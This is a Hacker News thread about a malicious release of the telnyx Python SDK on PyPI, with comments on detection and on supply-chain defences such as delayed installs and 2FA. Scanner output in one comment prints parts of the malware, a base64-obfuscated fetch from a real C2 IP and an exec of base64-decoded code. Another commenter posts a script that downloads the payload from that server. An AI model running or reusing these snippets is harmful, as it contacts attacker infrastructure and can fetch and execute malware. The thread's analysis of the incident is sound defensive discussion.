HN

Comments (89)

• Menu

  mil22
  For those using uv, you can at least partially protect yourself against such attacks by adding this to your pyproject.toml: [tool.uv] exclude-newer = "7 days" or this to your ~/.config/uv/uv.toml: exclude-newer = "7 days" This will prevent uv picking up any package version released within the last 7 days, hopefully allowing enough time for the community to detect any malware and yank the package version before you install it.
• Menu

  f311a
  They did not even try to hide the payload that much.Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes. hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip --min-confidence high --exclude HX4000 warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request. ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77 86:13 │ 7783 │ except: 7784 │ pass 7785 │ 7786 │ r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')}) │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000 7787 │ with urllib.request.urlopen(r, timeout=15) as d: 7788 │ with open(t, "wb") as f: 7789 │ f.write(d.read()) │ = Confidence: High Help: Data exfiltration is the unauthorized transfer of data from a computer. warning[HX4010]: Execution of obfuscated code. ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78 10:9 │ 7807 │ if os.name == 'nt': 7808 │ return 7809 │ try: 7810 │ ╭ subprocess.Popen( 7811 │ │ [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"], 7812 │ │ stdout=subprocess.DEVNULL, 7813 │ │ stderr=subprocess.DEVNULL, 7814 │ │ start_new_session=True 7815 │ │ ) │ ╰─────────^ HX4010 7816 │ except: 7817 │ pass 7818 │ │ = Confidence: VeryHigh Help: Obfuscated code exec can be used to bypass detection.
• zahlman
  > If the version shown is 4.87.1 or 4.87.2, treat the environment as compromised.More generally speaking one would have to treat the computer/container/VM as compromised. User-level malware still sucks. We've seen just the other day that Python code can run at startup time with .pth files (and probably many other ways). With a source distribution, it can run at install time, too (see e.g. https://zahlman.github.io/posts/python-packaging-3/).> What to Do If Affected> Downgrade immediately:> pip install telnyx==4.87.0Even if only the "environment" were compromised, that includes pip in the standard workflow. You can use an external copy of pip instead, via the `--python` option (and also avoid duplicating pip in each venv, wasting 10-15MB each time, by passing `--without-pip` at creation). I touch on both of these in https://zahlman.github.io/posts/python-packaging-2/ (specifically, showing how to do it with Pipx's vendored copy of pip). Note that `--python` is a hack that re-launches pip using the target environment; pip won't try to import things from that environment, but you'd still be exposed to .pth file risks.
• Menu

  jbrowning
  > The payload isn't delivered as a raw binary or a Python file. It's disguised as a .wav audio file.> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.Talk about burying the lede.
• cozzyd
  Wonder if publishing keys were compromised in one of the previous PyPI incidents...
• Menu

  ramimac
  We haven't blogged this yet, but a variety of teams found this in parallel.The packages are quarantined by PyPiFollow the overall incident: https://ramimac.me/teampcp/#phase-10Aikido/Charlie with a very quick blog: https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-...ReversingLabs, JFrog also made parallel reports
• _ache_
  How can we get the wav ? `curl -A "Mozilla/5.0" "http://<C2C_EndPoint>/hangup.wav"` does hang.No ... I tried hard. But still get a timeout. import urllib.request import base64 def _d(x): return base64.b64decode(x).decode("utf-8") C2C_URL = _d("aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg==") # C2C_URL = "http://XXXXX:8080/ringtone.wav" r = urllib.request.Request( C2C_URL, headers={_d("VXNlci1BZ2VudA=="): _d("TW96aWxsYS81LjA=")} ) with urllib.request.urlopen(r, timeout=15) as d: with open("/tmp/exatracted_tpcp.wav", "wb") as f: f.write(d.read())
• Menu

  viscousviolin
  Is there a notification channel you can subscribe to / look at if you want to stay up to date on compromised PyPI packages?
• ilaksh
  The way I use Telynx is via SIP which is an open protocol. No reason we should be relying on proprietary APIs for this stuff.On GitHub see my fork runvnc/PySIP. Please let me know if you know if something better for python that is not copy left or rely on some copy left or big external dependency. I was using baresip but it was a pain to integrate and configure with python.Anyway, after fixing a lot in the original PySIP my version works with Telynx. Not tested on other SIP providers.
• Menu

  deathanatos
  > The Telnyx platform, APIs, and infrastructure were not compromised. This incident was limited to the PyPI distribution channel for the Python SDK.Am I being too nitpicky to say that that is part of your infrastructure?Doesn't 2FA stop this attack in its tracks? PyPI supports 2FA, no?
• Menu

  6thbit
  So both this and litellm went straight to PyPI without going to GitHub first.Is there any way to setup PyPI to only publish packages that come from a certain pattern of tag that exists in GH? Would such a measure help at all here?
• jlundberg
  We have always been API first rather than SDK first.Never really thought too much about the security implications but that is of course a benefit too.Main reasoning for us has been to aim for a really nice HTTP API rather than hide uglyness with an SDK on top.
• Menu

  ivanvanderbyl
  Has anyone here used Telnyx? I tried to build a product against their API last year and 3 weeks after signing up they banned my account and made it impossible to get an answer as to why or re-enable it.
• anon
  undefined
• Menu

  spocchio
  Is there anyone who uses it? I see their repo's Initial Commit was on Jan 2026... quite a new package! Also, the number of GitHub stars and forks is quite low.Does the package have a user base, or did the malicious team target one of the many useless GitHub repos?
• indigodaddy
  Hah, need to setup a Grandstream HT801 this weekend and this cements my decision to use voip.ms vs telnyx. Not that the device would use that library (have no idea), but just, yeah generally, it's a good cue to stay away for me.
• Menu

  carlsborg
  Anthropic/OpenAI could own this space. They should offer a paid service that offers a mirror with LLM scanned and sandbox-evaluated package with their next gen models. Free for individuals, orgs can subscribe to it.
• kelvinjps10
  I received an email from them about the vulnerability but I don't remember ever using them
• infinitewars
  Is this happening in part due to the sheer volume of pull-requests with AI generated code.. things are slipping through?
• Menu

  slowmovintarget
  Telnyx provides voice capabilities for OpenClaw for those wondering.
• Menu

  charcircuit
  2FA needs to be required for publishing packages. An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.
• anthk
  The Guix PM in this context can create an isolated environment and import PyPI packages for you adapted into Guix Scheme manifest files. Not just Python, Perl, Ruby, Node... if you have to use dangerous our propietary environments for the enterprise, (not for personal computing), at least isolate them so the malware doesn't spread over.
• Menu

  dlcarrier
  At this point, I'm not updating anything using Python.Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure.I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good.It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.
• Menu

  rvz
  That's not good. Time to raise the package security draw bridge on vibe coders.
• oncallthrow
  I think it's only a matter of time at this point before a devastating supply chain attack occurs.Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.
• TZubiri
  Shoutouts to all the real engineers who use a generic http client to call APIs and weren't impacted by this.
• LoganDark
  I used to use Telnyx many years ago, but was squeezed out when they started adding layer after layer of mandatory identity verification. Nope.
• devnotes77
  [dead]
• iam_circuit
  [dead]
• midnightrun_ai
  [dead]
• zar1048576
  [dead]
• midnightrun_ai
  [dead]
• masterjay
  [dead]